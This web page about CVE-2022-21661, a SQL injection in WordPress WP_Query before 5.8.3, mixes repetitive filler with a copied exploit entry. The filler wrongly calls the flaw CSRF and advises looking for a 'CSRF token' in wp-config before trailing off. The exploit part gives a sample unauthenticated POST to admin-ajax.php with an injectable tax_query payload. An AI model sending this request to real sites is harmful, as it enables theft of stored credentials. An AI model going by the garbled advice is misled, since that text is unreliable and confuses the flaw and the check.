CVE-2022-21661 WordPress is a free and open-source content management system written in PHP with a MariaDB database.

If you have any questions regarding this, do not hesitate to reach out to us on Twitter or via email. We would be more than happy to assist you. WordPress has a large community of users and developers backing it, which has led to a high number of plugins and themes being created for it. However, due to the sheer number of these, it is not uncommon for some of them to have a security issue. If you are using one of these plugins or themes, and notice anything strange happening on your site, do not hesitate to report it to the developer.

How to check if your site is vulnerable to CSRF vulnerability?

If you had a WordPress site, and you noticed something strange happening on your site, do not hesitate to report it to the developer. If you are using one of these plugins or themes, and notice anything strange happening on your site, do not hesitate to report it to the developer. If a plugin or theme is vulnerable to CSRF vulnerability, then any user with malicious intent can hijack the website by loading an infected page.
The easiest way for you to check if your website is vulnerable is by looking for suspicious activity in the logs. You can find this information by accessing your wp-config file and looking for a CSRF token like below:

Summary:

The Importance of Reporting Security Issues
Although WordPress has a large community, it is not uncommon for some plugins and themes to have security issues. If you notice anything strange happening on your site, you should report it to the developer so they can take care of the issue.

What You Should Know Before Using WordPress

WordPress is an open source platform, which means that anyone can modify it and use it for free. This also means that anyone can make a plugin or theme for the platform and post it online in the hopes that others find it useful. Before using a WordPress plugin or theme, you must always do some research to ensure that they are not going to cause any problems on your site.

Exploit

# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,
#Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class,
#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

Timeline

Published on: 01/06/2022 23:15:00 UTC
Last modified on: 04/12/2022 18:47:00 UTC